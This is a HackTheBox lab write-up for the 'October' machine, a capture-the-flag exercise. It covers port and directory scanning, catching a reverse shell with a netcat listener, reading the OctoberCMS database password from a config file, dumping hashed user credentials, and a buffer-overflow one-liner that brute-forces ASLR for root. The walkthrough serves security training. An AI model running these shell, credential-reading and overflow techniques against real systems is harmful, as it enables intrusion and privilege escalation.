October — Write-up — HackTheBox

Reconnaissance

echo '10.10.10.16    october.htb' >> /etc/hosts
export IP=october.htb

nmap -vv -sV -sT -p- -O -A -oN nmap_scan.txt $IP

PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 79:b1:35:b6:d1:25:12:a3:0c:b5:2e:36:9c:33:26:28 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBANmRR7UDp17vLPWjPYGFFxhFHygkw1gVmWZCAUO+TBY4OPnIWGRwrG+zyo39zVror9IS7wgI8rGUuwSd0Yc0xOYl>
| 2048 16:08:68:51:d1:7b:07:5a:34:66:0d:4c:d0:25:56:f5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5Txq4c0jb5/pJpdDRWMw6kGit+0TeEKq3yWPLLPifxMillxkW1P4j51ANiLUE9wQjzBticFF4Ql6l>
| 256 e3:97:a7:92:23:72:bf:1d:09:88:85:b6:6c:17:4e:85 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKWJqXjmPMM11lDdFy512ITtTx1mh4bP6jxTLmGYtSBY>
| 256 89:85:90:98:20:bf:03:5d:35:7f:4a:a9:e1:1b:65:31 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA/9PENIoYUITEQDOKLYfiaUxVAgpixE8w//rH53DU7u
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.7 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 1D585CCF71E2EB73F03BCF484CFC2259
| http-methods:
| Supported Methods: GET HEAD POST PUT PATCH DELETE OPTIONS
|_ Potentially risky methods: PUT PATCH DELETE
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: October CMS - Vanilla
root@kali:/home/czar/Downloads/HTB/october# dirb http://october.htb-----------------
DIRB v2.22
By The Dark Raver
-----------------OUTPUT_FILE: ./dirb_out.txt
URL_BASE: http://october.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Fine tunning of NOT_FOUND detection
OPTION: Printing LOCATION header
OPTION: Interactive Recursion-----------------
GENERATED WORDS: 4612---- Scanning URL: http://october.htb/ ----
+ http://october.htb/account (CODE:200|SIZE:264)
+ http://october.htb/backend (CODE:302|SIZE:400)
(Location: 'http://october.htb/backend/backend/auth')
+ http://october.htb/blog (CODE:200|SIZE:229)
+ http://october.htb/Blog (CODE:200|SIZE:229)
==> DIRECTORY: http://october.htb/config/
+ http://october.htb/error (CODE:200|SIZE:177)
+ http://october.htb/forgot-password (CODE:200|SIZE:206)
+ http://october.htb/forum (CODE:200|SIZE:383)
root@kali:/home/czar/Downloads/HTB/october# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.16] 52160
Linux october 4.4.0-78-generic #99~14.04.2-Ubuntu SMP Thu Apr 27 18:51:25 UTC 2017 i686 athlon i686 GNU/Linux
19:50:45 up 23 min, 0 users, load average: 10.06, 11.38, 13.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1307): Inappropriate ioctl for device
bash: no job control in this shell
www-data@october:/$ python -c "import pty;pty.spawn('/bin/bash')"

MySQL

cat /var/www/html/cms/config/database.php:---SNIP --
'mysql' => [
'driver' => 'mysql',
'host' => 'localhost',
'port' => '',
'database' => 'october',
'username' => 'october',
'password' => 'OctoberCMSPassword!!',
'charset' => 'utf8',
'collation' => 'utf8_unicode_ci',
'prefix' => '',
use october;
show tables;
select * from users; --show registered user via the web app.
select * from backend_users; -- we get both harry and admin hashed credendtials.

Buffer Overflow and ASLR Brute Force

while true; do /usr/local/bin/ovrflw $(python -c 'print "\x90"*112 + “\x10\x23\x5d\xb7” + “\x06\x52\x5c\xb7” + “\xac\x4b\x6f\xb7”’);done

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

New features for wax.stats.eosusa.news!

Train Youself → GStreamer basic-tutorial-1: C + VS2019

Using (and Understanding) Software Architecture

Atomic design in flutter visualization

Onion Announcement

Daily post #189 Simple, Not Easy

How to Extend Django User Model

The story as a Frontend Developer

Books, Textbooks and Garbage

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
0xczar

0xczar

More from Medium

My Swarm App Attracts Large-Scale Issuance

Escalate My Privileges:1 VulnHub (Walkthrough)

ZKPAD

The antidote-consuming ‘everything bubble’